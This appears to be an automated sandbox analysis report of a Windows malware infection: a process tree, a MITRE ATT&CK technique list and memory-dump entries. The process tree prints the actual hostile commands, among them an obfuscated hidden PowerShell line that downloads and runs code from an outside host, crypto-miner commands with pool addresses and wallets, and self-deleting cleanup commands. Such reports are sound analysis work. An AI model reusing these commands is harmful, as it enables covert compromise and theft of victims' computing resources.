        cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        11⤵
        
        PID:6340
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        12⤵
        
        PID:7028
        
        C:\Users\Admin\AppData\Local\Temp\xcafecoewt2\IBInstaller_97039.exe
        
        "C:\Users\Admin\AppData\Local\Temp\xcafecoewt2\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        8⤵
        
        PID:5516
        
        C:\Users\Admin\AppData\Local\Temp\is-722EP.tmp\IBInstaller_97039.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-722EP.tmp\IBInstaller_97039.tmp" /SL5="$103D4,12322324,721408,C:\Users\Admin\AppData\Local\Temp\xcafecoewt2\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        9⤵
        
        PID:5772
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
        10⤵
        
        PID:5936
        
        C:\Users\Admin\AppData\Local\Temp\is-VMJGP.tmp\{app}\chrome_proxy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-VMJGP.tmp\{app}\chrome_proxy.exe"
        10⤵
        
        PID:5952
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-VMJGP.tmp\{app}\chrome_proxy.exe"
        11⤵
        
        PID:5432
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping localhost -n 4
        12⤵
        Runs ping.exe
        
        PID:5124
        
        C:\Users\Admin\AppData\Local\Temp\v1jn0n23z31\s4z0go0np0a.exe
        
        "C:\Users\Admin\AppData\Local\Temp\v1jn0n23z31\s4z0go0np0a.exe" /quiet SILENT=1 AF=756
        8⤵
        
        PID:5492
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\v1jn0n23z31\s4z0go0np0a.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\v1jn0n23z31\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617138368 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"
        9⤵
        
        PID:5448
    - - C:\Users\Admin\AppData\Local\Temp\463EVB2IYL\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\463EVB2IYL\setups.exe" ll
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1004
      - C:\Users\Admin\AppData\Local\Temp\is-688F4.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-688F4.tmp\setups.tmp" /SL5="$5003C,635399,250368,C:\Users\Admin\AppData\Local\Temp\463EVB2IYL\setups.exe" ll
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1532
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1148
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        
        PID:4168
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        Kills process with taskkill
        
        PID:4248
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"
      4⤵
      PID:4868
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        5⤵
        
        PID:4996
      - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        6⤵
        
        PID:3084
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
      4⤵
      PID:5056
    - - C:\Users\Admin\AppData\Roaming\A86B.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\A86B.tmp.exe"
        5⤵
        
        PID:1144
      - C:\Users\Admin\AppData\Roaming\A86B.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\A86B.tmp.exe"
        6⤵
        
        PID:5504
    - - C:\Users\Admin\AppData\Roaming\AA50.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\AA50.tmp.exe"
        5⤵
        
        PID:4264
      - C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        6⤵
        
        PID:6000
      - C:\Windows\system32\msiexec.exe
        
        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
        6⤵
        
        PID:3648
    - - C:\Users\Admin\AppData\Roaming\AB4B.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\AB4B.tmp.exe"
        5⤵
        
        PID:4256
      - C:\Windows\SysWOW64\cmd.exe
        
        /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\AB4B.tmp.exe
        6⤵
        
        PID:6192
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 3
        7⤵
        Delays execution with timeout.exe
        
        PID:6900
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
        5⤵
        
        PID:5364
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        6⤵
        Runs ping.exe
        
        PID:5864
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
      4⤵
      PID:4352

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:4296

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:4356

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4640

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4852

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:4132

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:4908

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:5752

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:5208
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding FB014BBDD378B9E12EC8C28EB18C3986 C
  2⤵
  PID:5552
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding AAC37DAA424461F9CC021B2C347C40D4
  2⤵
  PID:4756

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5228

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:3156

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:4388

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:7052

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:7136

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7200

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8048

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:4396

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:7716

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
PID:7296
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{1ea5ab73-9060-6d42-8f2f-0e0bfce4fd01}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
  2⤵
  PID:7812
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"
  2⤵
  PID:6592

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:7020

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:6388

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:8452

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:8576

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8712

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

T1102

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/196-451-0x0000000002B20000-0x00000000034C0000-memory.dmp

Filesize
9.6MB

Download
memory/196-453-0x0000000002B10000-0x0000000002B12000-memory.dmp

Filesize
8KB

Download
memory/200-586-0x00000000047F0000-0x00000000047F1000-memory.dmp

Filesize
4KB

Download
memory/752-218-0x0000000004920000-0x0000000004921000-memory.dmp

Filesize
4KB

Download
memory/752-219-0x0000000004920000-0x0000000004921000-memory.dmp

Filesize
4KB

Download
memory/752-222-0x0000000002D00000-0x0000000002D4C000-memory.dmp

Filesize
304KB

Download
memory/752-223-0x0000000000400000-0x0000000000450000-memory.dmp

Filesize
320KB

Download
memory/944-705-0x0000017D26610000-0x0000017D2668B000-memory.dmp

Filesize
492KB

Download
memory/944-428-0x0000017D26420000-0x0000017D26487000-memory.dmp

Filesize
412KB

Download
memory/944-114-0x0000017D26340000-0x0000017D263A7000-memory.dmp

Filesize
412KB

Download
memory/944-434-0x0000017D26510000-0x0000017D2658B000-memory.dmp

Filesize
492KB

Download
memory/992-139-0x0000029B970D0000-0x0000029B97137000-memory.dmp

Filesize
412KB

Download
memory/992-388-0x0000029B97420000-0x0000029B9749B000-memory.dmp

Filesize
492KB

Download
memory/992-353-0x0000029B97300000-0x0000029B97367000-memory.dmp

Filesize
412KB

Download
memory/992-691-0x0000029B979C0000-0x0000029B97A3B000-memory.dmp

Filesize
492KB

Download
memory/1004-46-0x0000000000401000-0x000000000040C000-memory.dmp

Filesize
44KB

Download
memory/1084-397-0x000001AAE4040000-0x000001AAE40BB000-memory.dmp

Filesize
492KB

Download
memory/1084-110-0x000001AAE3EE0000-0x000001AAE3F47000-memory.dmp

Filesize
412KB

Download
memory/1084-427-0x000001AAE3F50000-0x000001AAE3FB7000-memory.dmp

Filesize
412KB

Download
memory/1084-697-0x000001AAE40C0000-0x000001AAE413B000-memory.dmp

Filesize
492KB

Download
memory/1144-174-0x00000000048D0000-0x00000000048D1000-memory.dmp

Filesize
4KB

Download
memory/1144-184-0x0000000002DF0000-0x0000000002E37000-memory.dmp

Filesize
284KB

Download
memory/1196-637-0x0000000000A30000-0x0000000000A32000-memory.dmp

Filesize
8KB

Download
memory/1196-632-0x0000000000280000-0x0000000000281000-memory.dmp

Filesize
4KB

Download
memory/1196-630-0x00007FFC32030000-0x00007FFC32A1C000-memory.dmp

Filesize
9.9MB

Download
memory/1236-716-0x000001CAAE4C0000-0x000001CAAE53B000-memory.dmp

Filesize
492KB

Download
memory/1236-418-0x000001CAAE440000-0x000001CAAE4BB000-memory.dmp

Filesize
492KB

Download
memory/1236-433-0x000001CAADE80000-0x000001CAADEE7000-memory.dmp

Filesize
412KB

Download
memory/1236-128-0x000001CAADDA0000-0x000001CAADE07000-memory.dmp

Filesize
412KB

Download
memory/1296-124-0x000001AB12660000-0x000001AB126C7000-memory.dmp

Filesize
412KB

Download
memory/1296-714-0x000001AB12DC0000-0x000001AB12E3B000-memory.dmp

Filesize
492KB

Download
memory/1296-412-0x000001AB12CC0000-0x000001AB12D3B000-memory.dmp

Filesize
492KB

Download
memory/1296-432-0x000001AB12740000-0x000001AB127A7000-memory.dmp

Filesize
412KB

Download
memory/1340-459-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/1424-117-0x0000025FD8A90000-0x0000025FD8AF7000-memory.dmp

Filesize
412KB

Download
memory/1424-707-0x0000025FD92C0000-0x0000025FD933B000-memory.dmp

Filesize
492KB

Download
memory/1424-429-0x0000025FD8C70000-0x0000025FD8CD7000-memory.dmp

Filesize
412KB

Download
memory/1424-401-0x0000025FD9240000-0x0000025FD92BB000-memory.dmp

Filesize
492KB

Download
memory/1532-57-0x00000000032B1000-0x00000000032DC000-memory.dmp

Filesize
172KB

Download
memory/1532-53-0x0000000002101000-0x0000000002103000-memory.dmp

Filesize
8KB

Download
memory/1532-60-0x00000000032F1000-0x00000000032F8000-memory.dmp

Filesize
28KB

Download
memory/1532-61-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/1680-618-0x0000000003140000-0x0000000003157000-memory.dmp

Filesize
92KB

Download
memory/1912-430-0x0000024859DB0000-0x0000024859E17000-memory.dmp

Filesize
412KB

Download
memory/1912-710-0x0000024859FA0000-0x000002485A01B000-memory.dmp

Filesize
492KB

Download
memory/1912-121-0x0000024859850000-0x00000248598B7000-memory.dmp

Filesize
412KB

Download
memory/1912-406-0x0000024859EA0000-0x0000024859F1B000-memory.dmp

Filesize
492KB

Download
memory/2092-33-0x00000000027E0000-0x00000000027E2000-memory.dmp

Filesize
8KB

Download
memory/2092-24-0x00007FFC34C80000-0x00007FFC3566C000-memory.dmp

Filesize
9.9MB

Download
memory/2092-26-0x0000000000650000-0x0000000000651000-memory.dmp

Filesize
4KB

Download
memory/2156-413-0x00000276DA8B0000-0x00000276DA917000-memory.dmp

Filesize
412KB

Download
memory/2156-105-0x00000276DA280000-0x00000276DA2E7000-memory.dmp

Filesize
412KB

Download
memory/2156-431-0x00000276DA9A0000-0x00000276DAA1B000-memory.dmp

Filesize
492KB

Download
memory/2156-723-0x00000276DAAA0000-0x00000276DAB1B000-memory.dmp

Filesize
492KB

Download
memory/2184-460-0x0000000009030000-0x00000000090D1000-memory.dmp

Filesize
644KB

Download
memory/2184-332-0x0000000005980000-0x0000000005985000-memory.dmp

Filesize
20KB

Download
memory/2184-461-0x000000000B6D0000-0x000000000B731000-memory.dmp

Filesize
388KB

Download
memory/2184-326-0x00000000059B0000-0x00000000059B1000-memory.dmp

Filesize
4KB

Download
memory/2184-318-0x0000000000E10000-0x0000000000E11000-memory.dmp

Filesize
4KB

Download
memory/2184-316-0x000000006E930000-0x000000006F01E000-memory.dmp

Filesize
6.9MB

Download
memory/2248-356-0x000001CE5FC80000-0x000001CE5FCE7000-memory.dmp

Filesize
412KB

Download
memory/2248-141-0x000001CE5F670000-0x000001CE5F6D7000-memory.dmp

Filesize
412KB

Download
memory/2248-381-0x000001CE602C0000-0x000001CE6033B000-memory.dmp

Filesize
492KB

Download
memory/2248-711-0x000001CE603C0000-0x000001CE6043B000-memory.dmp

Filesize
492KB

Download
memory/2256-759-0x0000000002D80000-0x0000000003720000-memory.dmp

Filesize
9.6MB

Download
memory/2256-762-0x0000000002D70000-0x0000000002D72000-memory.dmp

Filesize
8KB

Download
memory/2360-103-0x0000000000300000-0x000000000031B000-memory.dmp

Filesize
108KB

Download
memory/2360-80-0x0000000002820000-0x000000000290F000-memory.dmp

Filesize
956KB

Download
memory/2360-32-0x0000000002550000-0x00000000026EC000-memory.dmp

Filesize
1.6MB

Download
memory/2360-102-0x0000000000310000-0x0000000000311000-memory.dmp

Filesize
4KB

Download
memory/2428-435-0x000001B25AEA0000-0x000001B25AF07000-memory.dmp

Filesize
412KB

Download
memory/2428-131-0x000001B25AE30000-0x000001B25AE97000-memory.dmp

Filesize
412KB

Download
memory/2428-719-0x000001B25B090000-0x000001B25B10B000-memory.dmp

Filesize
492KB

Download
memory/2428-419-0x000001B25AF90000-0x000001B25B00B000-memory.dmp

Filesize
492KB

Download
memory/2444-436-0x000001F12D040000-0x000001F12D0A7000-memory.dmp

Filesize
412KB

Download
memory/2444-133-0x000001F12CB10000-0x000001F12CB77000-memory.dmp

Filesize
412KB

Download
memory/2444-421-0x000001F12D130000-0x000001F12D1AB000-memory.dmp

Filesize
492KB

Download
memory/2444-722-0x000001F12D230000-0x000001F12D2AB000-memory.dmp

Filesize
492KB

Download
memory/2496-135-0x0000027F48D20000-0x0000027F48D87000-memory.dmp

Filesize
412KB

Download
memory/2496-682-0x0000027F49440000-0x0000027F494BB000-memory.dmp

Filesize
492KB

Download
memory/2496-425-0x0000027F48E30000-0x0000027F48E97000-memory.dmp

Filesize
412KB

Download
memory/2496-374-0x0000027F493C0000-0x0000027F4943B000-memory.dmp

Filesize
492KB

Download
memory/2796-648-0x0000000005050000-0x0000000005051000-memory.dmp

Filesize
4KB

Download
memory/2796-641-0x000000006E930000-0x000000006F01E000-memory.dmp

Filesize
6.9MB

Download
memory/3012-651-0x0000000005150000-0x0000000005151000-memory.dmp

Filesize
4KB

Download
memory/3084-111-0x00000000009F0000-0x0000000000A46000-memory.dmp

Filesize
344KB

Download
memory/3084-107-0x0000000000960000-0x000000000099A000-memory.dmp

Filesize
232KB

Download
memory/3116-298-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/3400-865-0x0000000000A00000-0x0000000000A01000-memory.dmp

Filesize
4KB

Download
memory/3424-28-0x0000000000400000-0x0000000000983000-memory.dmp

Filesize
5.5MB

Download
memory/3424-34-0x0000000000400000-0x0000000000983000-memory.dmp

Filesize
5.5MB

Download
memory/3500-623-0x00000000046E0000-0x00000000046E1000-memory.dmp

Filesize
4KB

Download
memory/3648-229-0x00000160C83C0000-0x00000160C83D4000-memory.dmp

Filesize
80KB

Download
memory/3648-261-0x0000000140000000-0x000000014070A000-memory.dmp

Filesize
7.0MB

Download
memory/3648-313-0x00000160C83F0000-0x00000160C8410000-memory.dmp

Filesize
128KB

Download
memory/3648-230-0x0000000140000000-0x000000014070A000-memory.dmp

Filesize
7.0MB

Download
memory/3648-227-0x0000000140000000-0x000000014070A000-memory.dmp

Filesize
7.0MB

Download
memory/3732-737-0x0000000002301000-0x0000000002303000-memory.dmp

Filesize
8KB

Download
memory/3732-740-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/3744-350-0x0000000000BC0000-0x0000000000C16000-memory.dmp

Filesize
344KB

Download
memory/3744-349-0x0000000000B30000-0x0000000000B6A000-memory.dmp

Filesize
232KB

Download
memory/3784-730-0x0000000002BD0000-0x0000000003570000-memory.dmp

Filesize
9.6MB

Download
memory/3784-732-0x0000000002BC0000-0x0000000002BC2000-memory.dmp

Filesize
8KB

Download
memory/3884-747-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/3900-317-0x0000000005040000-0x000000000504C000-memory.dmp

Filesize
48KB

Download
memory/3900-296-0x0000000000670000-0x0000000000671000-memory.dmp

Filesize
4KB

Download
memory/3900-283-0x000000006E930000-0x000000006F01E000-memory.dmp

Filesize
6.9MB

Download
memory/3900-310-0x00000000050D0000-0x00000000050D1000-memory.dmp

Filesize
4KB

Download
memory/3900-645-0x00000000082A0000-0x000000000832F000-memory.dmp

Filesize
572KB

Download
memory/3900-312-0x0000000005240000-0x0000000005241000-memory.dmp

Filesize
4KB

Download
memory/3900-639-0x0000000005D40000-0x0000000005DAC000-memory.dmp

Filesize
432KB

Download
memory/3900-300-0x0000000004FA0000-0x0000000004FA1000-memory.dmp

Filesize
4KB

Download
memory/4024-94-0x000001A64F860000-0x000001A64F8A4000-memory.dmp

Filesize
272KB

Download
memory/4024-125-0x000001A64F920000-0x000001A64F987000-memory.dmp

Filesize
412KB

Download
memory/4024-345-0x000001A64F8B0000-0x000001A64F8F4000-memory.dmp

Filesize
272KB

Download
memory/4024-426-0x000001A64FBF0000-0x000001A64FC6B000-memory.dmp

Filesize
492KB

Download
memory/4024-358-0x000001A64F990000-0x000001A64F9E2000-memory.dmp

Filesize
328KB

Download
memory/4024-423-0x000001A64FB00000-0x000001A64FB67000-memory.dmp

Filesize
412KB

Download
memory/4036-338-0x0000000002C00000-0x0000000002C45000-memory.dmp

Filesize
276KB

Download
memory/4036-333-0x00000000048B0000-0x00000000048B1000-memory.dmp

Filesize
4KB

Download
memory/4056-266-0x0000000004D70000-0x0000000004D71000-memory.dmp

Filesize
4KB

Download
memory/4080-43-0x0000000002460000-0x0000000002462000-memory.dmp

Filesize
8KB

Download
memory/4080-39-0x0000000002470000-0x0000000002E10000-memory.dmp

Filesize
9.6MB

Download
memory/4092-848-0x0000000004A00000-0x0000000004A01000-memory.dmp

Filesize
4KB

Download
memory/4124-157-0x0000000002D30000-0x00000000036D0000-memory.dmp

Filesize
9.6MB

Download
memory/4124-163-0x0000000002D20000-0x0000000002D22000-memory.dmp

Filesize
8KB

Download
memory/4124-260-0x0000000002D24000-0x0000000002D25000-memory.dmp

Filesize
4KB

Download
memory/4132-137-0x000001E189C70000-0x000001E189CD7000-memory.dmp

Filesize
412KB

Download
memory/4132-256-0x000001E18C200000-0x000001E18C303000-memory.dmp

Filesize
1.0MB

Download
memory/4200-363-0x0000000003171000-0x000000000319C000-memory.dmp

Filesize
172KB

Download
memory/4200-360-0x0000000002281000-0x0000000002283000-memory.dmp

Filesize
8KB

Download
memory/4200-362-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/4200-365-0x00000000031B1000-0x00000000031B8000-memory.dmp

Filesize
28KB

Download
memory/4216-393-0x00000000059D0000-0x00000000059E4000-memory.dmp

Filesize
80KB

Download
memory/4216-289-0x0000000000C50000-0x0000000000C51000-memory.dmp

Filesize
4KB

Download
memory/4216-304-0x0000000005610000-0x0000000005611000-memory.dmp

Filesize
4KB

Download
memory/4216-293-0x0000000005B40000-0x0000000005B41000-memory.dmp

Filesize
4KB

Download
memory/4216-284-0x000000006E930000-0x000000006F01E000-memory.dmp

Filesize
6.9MB

Download
memory/4216-295-0x0000000005560000-0x0000000005561000-memory.dmp

Filesize
4KB

Download
memory/4216-303-0x00000000054E0000-0x00000000054E1000-memory.dmp

Filesize
4KB

Download
memory/4228-323-0x0000000002E70000-0x0000000003810000-memory.dmp

Filesize
9.6MB

Download
memory/4228-758-0x0000000005030000-0x0000000005031000-memory.dmp

Filesize
4KB

Download
memory/4228-325-0x0000000002E60000-0x0000000002E62000-memory.dmp

Filesize
8KB

Download
memory/4256-468-0x0000000000400000-0x000000000587C000-memory.dmp

Filesize
84.5MB

Download
memory/4256-234-0x0000000007620000-0x000000000CA9C000-memory.dmp

Filesize
84.5MB

Download
memory/4316-673-0x0000000002EC0000-0x0000000002EC2000-memory.dmp

Filesize
8KB

Download
memory/4316-664-0x0000000002ED0000-0x0000000003870000-memory.dmp

Filesize
9.6MB

Download
memory/4412-239-0x0000000004660000-0x0000000004661000-memory.dmp

Filesize
4KB

Download
memory/4412-240-0x0000000004660000-0x0000000004661000-memory.dmp

Filesize
4KB

Download
memory/4420-328-0x00000000046E0000-0x00000000046E1000-memory.dmp

Filesize
4KB

Download
memory/4500-343-0x0000000002540000-0x0000000002EE0000-memory.dmp

Filesize
9.6MB

Download
memory/4500-344-0x0000000002530000-0x0000000002532000-memory.dmp

Filesize
8KB

Download
memory/4528-853-0x0000000004830000-0x0000000004831000-memory.dmp

Filesize
4KB

Download
memory/4544-761-0x0000000000400000-0x0000000000448000-memory.dmp

Filesize
288KB

Download
memory/4544-742-0x0000000000AC0000-0x0000000000ACD000-memory.dmp

Filesize
52KB

Download
memory/4616-439-0x0000000002DF0000-0x0000000003790000-memory.dmp

Filesize
9.6MB

Download
memory/4616-441-0x0000000000DF0000-0x0000000000DF2000-memory.dmp

Filesize
8KB

Download
memory/4660-745-0x0000000005130000-0x0000000005131000-memory.dmp

Filesize
4KB

Download
memory/4664-66-0x0000000002190000-0x0000000002B30000-memory.dmp

Filesize
9.6MB

Download
memory/4664-69-0x0000000002180000-0x0000000002182000-memory.dmp

Filesize
8KB

Download
memory/4744-306-0x00000000016A0000-0x00000000016C3000-memory.dmp

Filesize
140KB

Download
memory/4744-290-0x0000000000F80000-0x0000000000F81000-memory.dmp

Filesize
4KB

Download
memory/4744-314-0x00000000016D0000-0x00000000016D1000-memory.dmp

Filesize
4KB

Download
memory/4744-315-0x0000000001780000-0x0000000001782000-memory.dmp

Filesize
8KB

Download
memory/4744-299-0x0000000001490000-0x0000000001491000-memory.dmp

Filesize
4KB

Download
memory/4744-281-0x00007FFC30440000-0x00007FFC30E2C000-memory.dmp

Filesize
9.9MB

Download
memory/4792-79-0x0000000003000000-0x0000000003002000-memory.dmp

Filesize
8KB

Download
